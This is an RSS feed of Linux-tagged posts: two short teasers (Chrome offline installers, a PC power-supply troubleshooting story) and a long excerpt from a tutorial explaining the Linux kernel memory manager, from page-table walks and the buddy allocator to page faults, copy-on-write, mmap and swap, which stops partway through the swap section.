<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss.xsl" media="all"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>Roastidio.us Tagged with linux</title>
<link>https://roastidio.us/tag/2428</link>
<atom:link href="https://roastidio.us/tagged_with/linux" rel="self" type="application/rss+xml"></atom:link>
<description>Roastidio.us Tagged with linux</description>
<item>
<title>Google Chrome Offline Installer: Direct Download Links</title>
<link>https://webtrickz.com/google-chrome-offline-installer-download/</link>
<guid isPermaLink="false">4ZJvmMR0ZUlhGB__pjPmWScHuwj8iymKGxjO-w==</guid>
<pubDate>Thu, 25 Jun 2026 13:57:28 +0000</pubDate>
<description>Google Chrome is the world’s most popular web browser, but installing it isn’t always straightforward, especially when the online installer requires a stable internet connection. That’s where the offline setup file comes in handy. It includes all the files needed to install Chrome without downloading additional data during installation. In this guide, we cover how […] The post Google Chrome Offline Installer: Direct Download Links appeared first on WebTrickz.</description>
<content:encoded>&lt;p&gt;Google Chrome is the world’s most popular web browser, but installing it isn’t always straightforward, especially when the online installer requires a stable internet connection. That’s where the offline setup file comes in handy. It includes all the files needed to install Chrome without downloading additional data during installation. In this guide, we cover how […]&lt;/p&gt;&lt;p&gt;The post &lt;a href=&quot;https://webtrickz.com/google-chrome-offline-installer-download/&quot;&gt;Google Chrome Offline Installer: Direct Download Links&lt;/a&gt; appeared first on &lt;a href=&quot;https://webtrickz.com&quot;&gt;WebTrickz&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Beware the Cradle</title>
<link>https://www.logikalsolutions.com/wordpress/information-technology/cradle/</link>
<guid isPermaLink="false">kGNoZU_qWXVAbGdaiWD986k927LQBQ11QojQ3A==</guid>
<pubDate>Thu, 25 Jun 2026 06:07:59 +0000</pubDate>
<description>You know, a cradle can be the greatest thing on earth. It can also cost you days. A few days ago, when I was trying to determine just how weak the power supply in my HP Franken-Z was, it cost me days. The machine is running Linux Mint Mate edition. When I tried to stick in the NVS video card it couldn’t get powered on far enough to show me the logo screen. Just kept re-booting, … The post Beware the Cradle appeared first on Logikal Blog.</description>
<content:encoded>&lt;p&gt;You know, a cradle can be the greatest thing on earth. It can also cost you days. A few days ago, when I was trying to determine just how weak the power supply in my HP Franken-Z was, it cost me days. The machine is running Linux Mint Mate edition. When I tried to stick in the NVS video card it couldn’t get powered on far enough to show me the logo screen. Just kept re-booting, …&lt;/p&gt;&lt;p&gt;The post &lt;a href=&quot;https://www.logikalsolutions.com/wordpress/information-technology/cradle/&quot;&gt;Beware the Cradle&lt;/a&gt; appeared first on &lt;a href=&quot;https://www.logikalsolutions.com/wordpress&quot;&gt;Logikal Blog&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Memory Manager | Internals for Interns</title>
<link>https://internals-for-interns.com/posts/linux-kernel-memory-manager/</link>
<enclosure type="image/webp" length="0" url="https://internals-for-interns.com/images/linux-header.webp"></enclosure>
<guid isPermaLink="false">wOfJK3ikuPFSPfdBVy5n48keBxF_XsXa-4hHfA==</guid>
<pubDate>Wed, 24 Jun 2026 13:20:27 +0000</pubDate>
<description>In the previous article we looked at how a user program crosses the ring 3 → ring 0 boundary to ask the kernel for help. The example we used was read() — a file descriptor, a buffer pointer, a byte count. But we glossed over something important: what is that buffer? Who decided it existed? Who owns the physical RAM behind it? Those questions are what the memory manager answers. And it answers them for every process on the machine, simultaneously, for every allocation that has ever happene...</description>
<content:encoded>&lt;p&gt;In the &lt;a href=&quot;https://internals-for-interns.com/posts/linux-kernel-syscalls/&quot;&gt;previous article&lt;/a&gt;
we looked at how a user program crosses the ring 3 → ring 0 boundary to ask the kernel for help. The example we used was &lt;code&gt;read()&lt;/code&gt; — a file descriptor, a buffer pointer, a byte count. But we glossed over something important: what &lt;em&gt;is&lt;/em&gt; that buffer? Who decided it existed? Who owns the physical RAM behind it?&lt;/p&gt;&lt;p&gt;Those questions are what the memory manager answers. And it answers them for every process on the machine, simultaneously, for every allocation that has ever happened since boot. It’s one of the most complex subsystems in the kernel, so I want to approach it the way you’d approach an unfamiliar library — start at the front desk with the catalog, then walk back through the stacks.&lt;/p&gt;&lt;h2&gt;A Metaphor to Carry Us Through&lt;/h2&gt;&lt;p&gt;Here’s the mental model I want you to hold onto: &lt;strong&gt;think of memory management as an enormous public library in your town.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;The library has one vast collection of physical &lt;strong&gt;shelves&lt;/strong&gt;, and every shelf is identical: one shelf is a &lt;strong&gt;page frame&lt;/strong&gt; — 4 KB of physical RAM. There’s a fixed number of them: on a machine with 16 GB of RAM, about four million shelves, and that’s all you’ll ever have. This is the real, finite, physical stuff.&lt;/p&gt;&lt;p&gt;Now the trick. No reader ever walks the shelves directly. Instead, the reader goes to the library’s &lt;strong&gt;service desk&lt;/strong&gt; and asks for an entry by its number. The desk keeps &lt;strong&gt;a private catalog for every reader&lt;/strong&gt; — a personal set of index cards — and looks yours up to find where the entry really lives. 
A card says “the thing you call entry #5,000 lives on physical shelf 19.” Two different readers can both have a card numbered #5,000, and those cards can point at completely different shelves — or, sometimes, deliberately at the &lt;em&gt;same&lt;/em&gt; shelf.&lt;/p&gt;&lt;p&gt;With that in mind, let’s go from the ground up. We start with the hardware.&lt;/p&gt;&lt;h2&gt;The MMU and Page Tables&lt;/h2&gt;&lt;p&gt;Remember the service desk: you hand it an entry number, it looks the entry up in your catalog, and it tells you the real shelf the data sits on — and it does this for every single thing you ask for. That desk is real hardware, the &lt;strong&gt;MMU&lt;/strong&gt; (Memory Management Unit), and the catalog it reads is a tree of kernel-managed tables called &lt;strong&gt;page tables&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Now the concepts behind the metaphor. Every time an application touches memory — reading a variable, calling a function, fetching a string — it uses a &lt;em&gt;virtual&lt;/em&gt; address (the entry number you hand the desk), and that address never reaches the RAM chips directly. The MMU has to translate it into the physical address where the data actually lives, and to do that it walks the process’s page tables. The kernel writes the cards; the MMU reads them, billions of times a second.&lt;/p&gt;&lt;p&gt;But the library has a catalog for every reader — how does the MMU know it’s &lt;em&gt;your&lt;/em&gt; application’s catalog it should be reading, and not someone else’s? From the &lt;strong&gt;&lt;code&gt;CR3&lt;/code&gt; register&lt;/strong&gt;. (&lt;code&gt;CR3&lt;/code&gt; is the x86-64 name; other architectures use a different register for the same job — &lt;code&gt;TTBR0_EL1&lt;/code&gt; on ARM64, &lt;code&gt;satp&lt;/code&gt; on RISC-V — but the idea is identical.) 
&lt;code&gt;CR3&lt;/code&gt; holds the physical address of the root of your process’s page table tree — its &lt;strong&gt;PGD (Page Global Directory)&lt;/strong&gt; — and that root is the single thing that points at your exclusive catalog and defines what memory belongs to you. On every context switch, the kernel just reloads &lt;code&gt;CR3&lt;/code&gt; with the next process’s PGD, swapping in a completely different catalog: from that instant the same virtual addresses resolve to entirely different physical memory.&lt;/p&gt;&lt;p&gt;That catalog isn’t one giant flat table — that would be impossibly large. It’s a tree of nested drawers, and on modern x86-64 with 5-level paging the tree is five levels deep: &lt;strong&gt;PGD → P4D → PUD → PMD → PTE&lt;/strong&gt;. (Most x86-64 machines actually run just &lt;em&gt;four&lt;/em&gt; levels — PGD → PUD → PMD → PTE, with the P4D folded away — since 5-level paging needs both newer hardware and a kernel built for it; but five is the general case, and the extra level changes nothing about how the walk works.) The clever part is that the virtual address &lt;em&gt;itself&lt;/em&gt; tells the MMU which drawer to open at each level. The hardware slices the address into six pieces — one index per level, plus a final offset. Say our process reads from:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://internals-for-interns.com/images/linux-kernel-memory-diagram-1.webp&quot; alt=&quot;Diagram slicing the virtual address 0x0005A0320C82A000 into its six fields: the PGD, P4D, PUD, PMD and PTE indexes (9 bits each) plus the 12-bit offset within the page&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Each index is 9 bits — exactly enough to pick one of 512 entries (2⁹ = 512), because every drawer is a single 4 KB page holding 512 entries of 8 bytes (64 bits) each (512 × 8 = 4096). 
The trailing 12 bits aren’t an index at all; they’re the offset &lt;em&gt;inside&lt;/em&gt; the final page (2¹² = 4096, our 4 KB page size).&lt;/p&gt;&lt;p&gt;Now the walk. The MMU starts at the PGD that &lt;code&gt;CR3&lt;/code&gt; points to, uses the first index (5) to pick an entry, and that entry hands it the physical address of the next drawer down. It uses the next index (320) to pick an entry &lt;em&gt;there&lt;/em&gt;, which points to the next drawer, and so on, one level at a time:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://internals-for-interns.com/images/linux-kernel-memory-diagram-2.webp&quot; alt=&quot;Diagram of the five-level page table walk starting from CR3: each level (PGD, P4D, PUD, PMD, PTE) uses one index from the virtual address to pick an entry that points to the next drawer down, ending at the page frame @ 0x8E33000&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;You might wonder why those entry values look like &lt;code&gt;0x3A05007&lt;/code&gt; instead of a clean &lt;code&gt;0x3A05000&lt;/code&gt;. Since every drawer is page-aligned, the low 12 bits of any next-drawer address are always zero, so the entry format reuses them to stash a handful of &lt;strong&gt;permission bits&lt;/strong&gt; describing what you’re allowed to do with whatever the entry points to: whether the page is writable, whether it’s actually in RAM right now, whether user-space is allowed to reach it. (Whether code can be executed from it is recorded as well, but on x86-64 that no-execute flag sits at the other end of the entry, in bit 63, not in the low 12 bits.) That trailing &lt;code&gt;0x007&lt;/code&gt;, for instance, just means present, writable, and user-accessible. These bits are also how memory protection is enforced — a code page leaves the writable bit cleared so you can’t overwrite your own instructions, a stack page is marked no-execute so injected machine code won’t run. 
(They’re all defined in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/arch/x86/include/asm/pgtable_types.h#L10&quot;&gt;&lt;code&gt;arch/x86/include/asm/pgtable_types.h&lt;/code&gt;&lt;/a&gt;.)&lt;/p&gt;&lt;p&gt;The entry at the bottom — the &lt;strong&gt;PTE (Page Table Entry)&lt;/strong&gt; — is the one that finally names a real &lt;strong&gt;page frame&lt;/strong&gt;: 4 KB of physical RAM (one shelf in our library). The MMU takes that frame address and adds the 12-bit offset it set aside at the very start, and &lt;em&gt;that&lt;/em&gt; is the physical address it reads from memory — the exact byte our virtual address was pointing at all along:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;physical = 0x8E33000 + 0x000 = 0x8E33000&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Five lookups to turn one virtual address into one physical address. (The CPU caches recent translations in a small buffer called the &lt;strong&gt;TLB&lt;/strong&gt; so it doesn’t repeat this walk on every access; and the &lt;strong&gt;L1/L2/L3 caches&lt;/strong&gt; keep recently-used data close to the CPU so it doesn’t hit RAM every time. We won’t cover either here.)&lt;/p&gt;&lt;p&gt;Now that we have a physical address, we can go to the right place to fetch the information — but who keeps track of which pages are occupied, which are free, and what hardware rules apply to each? That’s what the physical layer is for.&lt;/p&gt;&lt;h2&gt;Shelves, Wings and the Shelf Registry&lt;/h2&gt;&lt;p&gt;The library keeps a registry with one entry describing the state of every single shelf. The kernel does exactly this: for every 4 KB page frame in the machine there’s one small record, called a &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L79&quot;&gt;&lt;code&gt;struct page&lt;/code&gt;&lt;/a&gt;. 
Conceptually, you can think of those records as a registry indexed by the page’s serial number, its &lt;strong&gt;PFN (Page Frame Number)&lt;/strong&gt;: give the kernel a PFN, and it can find the corresponding &lt;code&gt;struct page&lt;/code&gt; through its memmap/vmemmap machinery. On a machine with 16 GB of RAM, that’s over four million records.&lt;/p&gt;&lt;p&gt;Each record only holds the essentials the kernel needs to manage that one page. It knows whether the page is free or in use. It keeps a reference count — how many parts of the system are still relying on that page — so the kernel can tell when nobody needs it anymore and it’s safe to reclaim. It remembers what the page is backing, whether that’s a piece of a file’s cached contents or anonymous memory like a process’s heap or stack, and how many page tables are pointing at it, which matters when a page is shared between several processes. And it carries a few status flags: is the page dirty (written to but not yet saved to disk), is it locked, is it being written back right now. That handful of fields, multiplied across all four million pages, is enough for the kernel to track the life of every piece of physical memory in the machine.&lt;/p&gt;&lt;p&gt;One modern wrinkle worth flagging before we move on: the kernel increasingly manages shelves not one at a time but in shrink-wrapped bundles of adjacent ones called &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L401&quot;&gt;&lt;strong&gt;folios&lt;/strong&gt;&lt;/a&gt; — a single index card for a whole run of pages, so a larger file chunk or a huge page can be tracked, reclaimed, and moved as one unit instead of page by page. In fact, most of the bookkeeping just described (the reference count, the dirty/locked flags, what the page is backing, its place on the reclaim lists we’ll meet later) lives on the folio now, with &lt;code&gt;struct page&lt;/code&gt; itself being slimmed down. 
We’ll keep saying “page” throughout for clarity, but &lt;em&gt;folio&lt;/em&gt; is the word you’ll run into all over current kernel source — just read it as “one or more pages handled together.” We won’t cover it further here.&lt;/p&gt;&lt;p&gt;That registry treats every page the same way, but the hardware underneath doesn’t — some come with strings attached.&lt;/p&gt;&lt;h3&gt;Zones: Pages With Special Rules&lt;/h3&gt;&lt;p&gt;Not all pages are equally usable by everyone. Picture a delivery courier whose cart only reaches the lowest shelves — anything that courier handles has to be placed down low, never on the upper floors. Physical RAM has the same kind of quirk: some old devices can only do DMA (Direct Memory Access) into the lowest 16 MB of memory, and some 32-bit devices can’t address anything above 4 GB. To keep track of these constraints, the kernel splits RAM into &lt;strong&gt;zones&lt;/strong&gt; — a low zone for those restricted devices, a &lt;em&gt;normal&lt;/em&gt; zone where the vast majority of allocations land, and a few special-purpose ones. Most of the time everything comes from the normal zone; the restricted zones only matter when a driver specifically needs low-address memory.&lt;/p&gt;&lt;p&gt;Zones sort pages by what they’re &lt;em&gt;allowed&lt;/em&gt; to do; a second dimension matters just as much — &lt;em&gt;where&lt;/em&gt; in the machine a page physically sits.&lt;/p&gt;&lt;h3&gt;NUMA Nodes: Different Wings, Different Walks&lt;/h3&gt;&lt;p&gt;Picture the library spread across several wings. Books in your own wing are a short walk away; fetching one from a distant wing means a long trek down the corridor. On multi-socket machines, RAM is physically attached to different CPU sockets in just this way. A CPU reading from RAM attached to its own socket is fast (local access); reading from another socket’s RAM is slower (remote access). 
The kernel models this with &lt;strong&gt;NUMA (Non-Uniform Memory Access) nodes&lt;/strong&gt;, each with its own set of zones. That’s why, whenever it can, it tries to satisfy an allocation from the node’s local memory and dodge the remote-access penalty; on a single-socket machine the question doesn’t even come up, since there’s only one node.&lt;/p&gt;&lt;p&gt;Now we know how the pages are organized — so how does the library actually hand them out?&lt;/p&gt;&lt;h2&gt;The Buddy Allocator — Reserving Runs of Pages&lt;/h2&gt;&lt;p&gt;The librarians don’t just give out one page at a time. They keep their free space organized as &lt;em&gt;runs&lt;/em&gt; of adjacent empty pages, and when you ask for space they find a run of the right length — splitting a long run in half when a shorter one will do, and gluing two short runs back together when both come free. That’s the &lt;strong&gt;buddy allocator&lt;/strong&gt;, implemented in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/page_alloc.c&quot;&gt;&lt;code&gt;mm/page_alloc.c&lt;/code&gt;&lt;/a&gt; (~7,800 lines). It manages free physical pages in lists grouped by &lt;strong&gt;order&lt;/strong&gt;, where order &lt;em&gt;n&lt;/em&gt; means a block of 2ⁿ contiguous pages:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Order 0: 4 KB (1 page)&lt;/li&gt;&lt;li&gt;Order 1: 8 KB (2 pages)&lt;/li&gt;&lt;li&gt;Order 2: 16 KB (4 pages)&lt;/li&gt;&lt;li&gt;…&lt;/li&gt;&lt;li&gt;Order 10: 4 MB (1,024 pages)&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;When the kernel wants to allocate a 16 KB block (order 2), the buddy allocator looks at the order-2 free list. If there’s a run there, it takes it. If not, it grabs an order-3 block (32 KB), splits it in half — the two halves are &lt;em&gt;buddies&lt;/em&gt;, adjacent runs of pages — hands one back, and puts the other on the order-2 list. When the block is later freed, the allocator checks if its buddy is also free; if so, it glues them back into a longer run. 
This merging keeps large contiguous stretches of memory available for things like huge pages and DMA buffers.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://internals-for-interns.com/images/linux-kernel-memory-diagram-3.webp&quot; alt=&quot;Diagram of the buddy allocator: free runs grouped by order (order n = 2ⁿ pages), the SPLIT path borrowing an order-3 block and cutting it into two buddies, and the MERGE path gluing two free buddies back into one larger run&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Splitting and gluing runs keeps fragmentation in check, but there’s still one bottleneck left on the fast path: the lock itself.&lt;/p&gt;&lt;h3&gt;Per-CPU Caches: Skipping the Lock&lt;/h3&gt;&lt;p&gt;The buddy allocator protects its free lists with a zone lock — think of it as needing the head librarian’s key every time you touch the shelf registry. Taking that lock on every single allocation would be a bottleneck in a system with hundreds of CPUs. So each CPU has a small &lt;strong&gt;Per-CPU Page cache (PCP)&lt;/strong&gt; — a personal cache of pre-allocated pages (mostly single pages, plus a few small runs) that the CPU can give out and take back without bothering the head librarian for the common case. The PCP is defined in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mmzone.h#L744&quot;&gt;&lt;code&gt;include/linux/mmzone.h&lt;/code&gt;&lt;/a&gt; and refills from the buddy allocator in batches when it runs low.&lt;/p&gt;&lt;p&gt;The buddy allocator deals in whole pages, but most of what the kernel needs is far smaller — so the next layer up is built to carve those pages into something finer-grained.&lt;/p&gt;&lt;h2&gt;Kernel Allocators — Specialized Drawers&lt;/h2&gt;&lt;p&gt;The structures the kernel needs room for are its &lt;em&gt;own&lt;/em&gt; small internal records — the bookkeeping it uses to run the system, which lives entirely inside the kernel and never in user space. 
Handing over an entire 4 KB page for a 64-byte structure is like dedicating a whole shelf to a single sticky note, wasting 4,032 bytes. The answer is a &lt;strong&gt;slab allocator&lt;/strong&gt;: a &lt;em&gt;slab&lt;/em&gt; is a page (or a few pages) grabbed once from the buddy allocator and dedicated to objects of one single size, lined up side by side like books of equal height on a shelf. A request for a 64-byte object simply hands back the next free spot instead of burning a whole page on it — one shelf, many identical books.&lt;/p&gt;&lt;h3&gt;SLUB: The Default Kernel Object Allocator&lt;/h3&gt;&lt;p&gt;Linux uses &lt;strong&gt;SLUB&lt;/strong&gt; (implemented in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/slub.c&quot;&gt;&lt;code&gt;mm/slub.c&lt;/code&gt;&lt;/a&gt;) as its default slab allocator. To organize all this, SLUB groups slabs into &lt;strong&gt;caches&lt;/strong&gt;: a cache is the whole set of slabs dedicated to one kind of book — objects of a single specific size, like a &lt;code&gt;task_struct&lt;/code&gt; or an &lt;code&gt;inode&lt;/code&gt;. So there’s a cache for &lt;code&gt;task_struct&lt;/code&gt;s, another for &lt;code&gt;inode&lt;/code&gt;s, and so on for every kind of structure; each one manages its own collection of &lt;strong&gt;slabs&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;When you call &lt;code&gt;kmalloc(size, GFP_KERNEL)&lt;/code&gt;, SLUB rounds the request up to one of a handful of size classes (8, 16, 32, 64, 96, 128, … bytes) and goes to the cache for that class. And here’s the key detail: each cache keeps a small &lt;em&gt;per-CPU stash of free objects&lt;/em&gt;. So when your code asks for a 64-byte object, the CPU it’s running on can usually take the next one straight from its own stash without touching a shared global list. 
Only when that stash runs empty does SLUB take the slow path, refilling it from the cache’s slabs — and grabbing a fresh slab (a new page with room for more objects) from the buddy allocator when those run out too. (In kernel code this per-CPU layer is called &lt;em&gt;sheaves&lt;/em&gt;, backed by a per-NUMA-node structure called a &lt;em&gt;barn&lt;/em&gt; that shuffles objects between CPUs as some run low and others pile up. Don’t worry about the names; the point is the idea: each CPU pulls from its own stash, so in the common case nobody has to compete for a shared global resource.)&lt;/p&gt;&lt;p&gt;If this sounds familiar, it’s because it’s similar to the trick the Go runtime’s allocator uses. Go gives every &lt;code&gt;P&lt;/code&gt; (its scheduling processor) a private &lt;code&gt;mcache&lt;/code&gt; holding one &lt;code&gt;mspan&lt;/code&gt; per size class, each span carved into fixed-size slots — so a goroutine can grab small objects without ever touching a global lock. Same idea, different runtime; I went through it in detail in &lt;a href=&quot;https://internals-for-interns.com/posts/go-memory-allocator/&quot;&gt;The Memory Allocator&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;SLUB tackles objects &lt;em&gt;smaller&lt;/em&gt; than a page. The opposite problem — needing a buffer bigger than any contiguous run the buddy allocator can spare — calls for a different trick.&lt;/p&gt;&lt;h3&gt;vmalloc: When Physical Contiguity Isn’t Needed&lt;/h3&gt;&lt;p&gt;The buddy allocator hands out physically &lt;em&gt;contiguous&lt;/em&gt; runs of pages. For large allocations this gets harder and harder as memory fragments over time. But sometimes you just need a big buffer and don’t care whether the backing pages are next to each other in physical memory.&lt;/p&gt;&lt;p&gt;That’s what &lt;code&gt;vmalloc()&lt;/code&gt; is for (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/vmalloc.c&quot;&gt;&lt;code&gt;mm/vmalloc.c&lt;/code&gt;&lt;/a&gt;). It grabs individual pages from the buddy allocator wherever they happen to be free, then sets up a run of &lt;em&gt;consecutive page-table entries&lt;/em&gt; that point at those scattered pages. The pages are spread all over the building, but to the code using the buffer it looks like one unbroken range.&lt;/p&gt;&lt;p&gt;The downside: if what you really need, for hardware reasons, is a single physically contiguous block of memory (a DMA buffer, say), this won’t do.&lt;/p&gt;&lt;p&gt;Buddy, SLUB and vmalloc are all about the kernel feeding its &lt;em&gt;own&lt;/em&gt; appetite for memory. A user-space process gets its memory through a different layer entirely — one built on top of everything we’ve seen.&lt;/p&gt;&lt;h2&gt;Virtual Memory for Processes — The Address Space and Its Regions&lt;/h2&gt;&lt;p&gt;Here’s the key idea. The page tables we saw earlier only record what’s &lt;em&gt;actually&lt;/em&gt; mapped at this instant. But a process’s address space is mostly &lt;strong&gt;promises&lt;/strong&gt;: huge ranges of addresses the process is &lt;em&gt;allowed&lt;/em&gt; to use, but that aren’t backed by any physical memory yet. 
The page tables can’t represent those promises, so the kernel keeps a separate, higher-level picture of what each process’s memory is &lt;em&gt;supposed&lt;/em&gt; to look like.&lt;/p&gt;&lt;p&gt;That picture starts with one record per process, its &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L1123&quot;&gt;&lt;code&gt;mm_struct&lt;/code&gt;&lt;/a&gt; — the single master description of that process’s entire view of memory. It points at the process’s page tables and tracks the broad layout, but mostly it’s a container for the regions the address space is divided into.&lt;/p&gt;&lt;p&gt;Those regions are where the real detail lives. Each one is a &lt;strong&gt;VMA (Virtual Memory Area)&lt;/strong&gt; (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L913&quot;&gt;&lt;code&gt;struct vm_area_struct&lt;/code&gt;&lt;/a&gt;): a contiguous range of addresses that all share the same rules. For our purposes, the important pieces of a VMA are the range of addresses it covers, the permissions on that range (read, write, execute, and whether it’s shared), and what’s behind it: a specific file it was mapped from, or nothing at all, in which case it’s &lt;em&gt;anonymous&lt;/em&gt; memory like the heap or the stack. A typical process is just a handful of these stitched together — one for its code, one for its data, one for the heap, one for the stack, and more for each shared library or mapped file. You can list them for any running process with &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/maps&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;But a VMA is still just a promise — a labeled range with rules and nothing behind it. 
The moment a process actually reaches into one of those addresses, that promise has to be turned into real memory, and that’s the job of the page fault.&lt;/p&gt;&lt;h2&gt;Page Faults — The Librarian Who Fetches on Demand&lt;/h2&gt;&lt;p&gt;When you call &lt;code&gt;malloc()&lt;/code&gt; and the C library asks the kernel for memory, the kernel usually hands back a virtual address range without allocating any physical pages yet. The address range exists, but no page is shelved and nothing in the page tables points anywhere yet.&lt;/p&gt;&lt;p&gt;The first time your code actually &lt;em&gt;reads or writes&lt;/em&gt; that memory, the CPU tries to translate the address, finds nothing in the page tables for it, and raises a &lt;strong&gt;#PF (page fault) exception&lt;/strong&gt; — the reader has opened an entry with no book behind it. This is the bell that summons the librarian: the CPU jumps into the kernel’s fault handler (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/arch/x86/mm/fault.c#L1462&quot;&gt;&lt;code&gt;handle_page_fault()&lt;/code&gt;&lt;/a&gt;).&lt;/p&gt;&lt;p&gt;The handler’s job is to figure out what &lt;em&gt;should&lt;/em&gt; be at that address and make it so. First it finds the VMA covering the faulting address. If there isn’t one, or the access breaks the VMA’s permissions (writing to read-only memory, say), that’s a genuine bug and the process gets a &lt;code&gt;SIGSEGV&lt;/code&gt;. Otherwise the kernel looks at &lt;em&gt;what’s missing&lt;/em&gt; and reacts accordingly: if nothing was ever mapped there, it provides a fresh blank page — or, for a file-backed region, reads the right chunk of the file in. 
(There’s one neat shortcut: the very first access to anonymous memory is often a &lt;em&gt;read&lt;/em&gt;, and a read of a page that should just be zeros doesn’t need its own allocation at all — the kernel points it at a single shared, read-only &lt;strong&gt;zero page&lt;/strong&gt;, and only allocates a real page once you actually write.)&lt;/p&gt;&lt;p&gt;This lazy approach — &lt;strong&gt;demand paging&lt;/strong&gt; — is why a process that allocates 1 GB but only uses 10 MB doesn’t consume 1 GB of RAM. The kernel only builds what the process actually touches.&lt;/p&gt;&lt;p&gt;Demand paging keeps a fresh allocation cheap. A closely related trick keeps &lt;em&gt;copying&lt;/em&gt; an entire address space cheap too.&lt;/p&gt;&lt;h3&gt;Copy-on-Write: Photocopy When You Annotate&lt;/h3&gt;&lt;p&gt;When a process calls &lt;code&gt;fork()&lt;/code&gt;, the child gets its own address space that starts as an exact copy of the parent’s. Actually copying all that memory would be slow and wasteful. It’d be like photocopying every book a reader owns just so a second reader can have a set they’ll probably never write in.&lt;/p&gt;&lt;p&gt;So the kernel cheats. With &lt;strong&gt;Copy-on-Write (CoW)&lt;/strong&gt;, parent and child simply &lt;em&gt;share&lt;/em&gt; the same physical pages, but every writable private page is marked read-only in both. As long as both only ever read, nothing else has to happen — they read the same books side by side.&lt;/p&gt;&lt;p&gt;The trick springs the moment either one tries to write. The CPU faults on the read-only page, and only &lt;em&gt;then&lt;/em&gt; does the kernel make a private copy: it grabs a fresh page, copies the contents across, and repoints that process’s page-table entry at the new, writable version. The other process keeps using the original, undisturbed. 
Each side ends up with its own copy of only the pages it actually changed.&lt;/p&gt;&lt;p&gt;Demand paging and copy-on-write are both about filling in a region that already exists. But all along we’ve taken those regions for granted — so let’s back up and see how one gets created in the first place.&lt;/p&gt;&lt;h2&gt;mmap — Claiming a Range of Addresses&lt;/h2&gt;&lt;p&gt;So where do VMAs actually come from? Most of them come from &lt;code&gt;mmap()&lt;/code&gt;. You can think of &lt;code&gt;mmap()&lt;/code&gt; as the call that says “give me a region of address space, and remember what it’s for” — and what it produces, under the hood, is a new VMA. The work happens in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/mmap.c#L336&quot;&gt;&lt;code&gt;do_mmap()&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;The kernel doesn’t have to do much here. It rounds your requested size up to a whole number of pages, turns the protections you asked for (&lt;code&gt;PROT_READ&lt;/code&gt;, &lt;code&gt;PROT_WRITE&lt;/code&gt;, &lt;code&gt;PROT_EXEC&lt;/code&gt;) into the new region’s permissions, and finds a free gap in the address space big enough to hold it. Then it creates the VMA describing that range and adds it to the process’s set of regions. If you’re mapping a file, it also notes &lt;em&gt;which&lt;/em&gt; file backs the region, so that a later page fault knows where to fetch the contents from.&lt;/p&gt;&lt;p&gt;And for an ordinary lazy mapping, that’s it — &lt;code&gt;mmap()&lt;/code&gt; returns. Notice what &lt;em&gt;didn’t&lt;/em&gt; happen: no physical memory was handed out and no page tables were filled in. All &lt;code&gt;mmap()&lt;/code&gt; did was reserve a range of addresses and write down the rules for it. The actual pages show up later, one page fault at a time, the first time you touch them. 
Some mappings ask the kernel to do more up front — &lt;code&gt;MAP_POPULATE&lt;/code&gt;, locked mappings, huge pages, and some device mappings are examples — but lazy mappings are the normal case to keep in mind.&lt;/p&gt;&lt;p&gt;This is also, indirectly, how &lt;code&gt;malloc()&lt;/code&gt; works. When the C library needs more room, it asks the kernel for raw address space — either with &lt;code&gt;brk()&lt;/code&gt;, which simply moves the top of the heap, or with an anonymous &lt;code&gt;mmap()&lt;/code&gt; — and then hands out small pieces of that range to your program on its own. From the kernel’s point of view there’s no such thing as &lt;code&gt;malloc&lt;/code&gt;: there’s just a request for address space, followed by page faults as the program starts using it.&lt;/p&gt;&lt;p&gt;Every mechanism so far has been about &lt;em&gt;handing memory out&lt;/em&gt; — reserving ranges, faulting pages in, sharing them between processes. Eventually, though, the machine runs out of room, and the kernel has to start taking pages &lt;em&gt;back&lt;/em&gt;.&lt;/p&gt;&lt;h2&gt;Memory Pressure: When the Shelves Fill Up&lt;/h2&gt;&lt;p&gt;The shelves are finite, so sooner or later they fill up. When that happens, the library does what a real library does with books nobody has opened in years: it boxes them up and ships them to an &lt;strong&gt;off-site annex&lt;/strong&gt;, freeing the shelf for something people actually want. The annex is &lt;strong&gt;swap&lt;/strong&gt; — disk space the kernel keeps around as overflow — and the worker running the operation is &lt;strong&gt;kswapd&lt;/strong&gt;, a kernel thread that wakes up whenever free memory runs low and quietly reclaims pages until there’s breathing room again.&lt;/p&gt;&lt;p&gt;So how does kswapd decide &lt;em&gt;which&lt;/em&gt; books to box up? It goes after the coldest ones — pages nobody has touched in a while. 
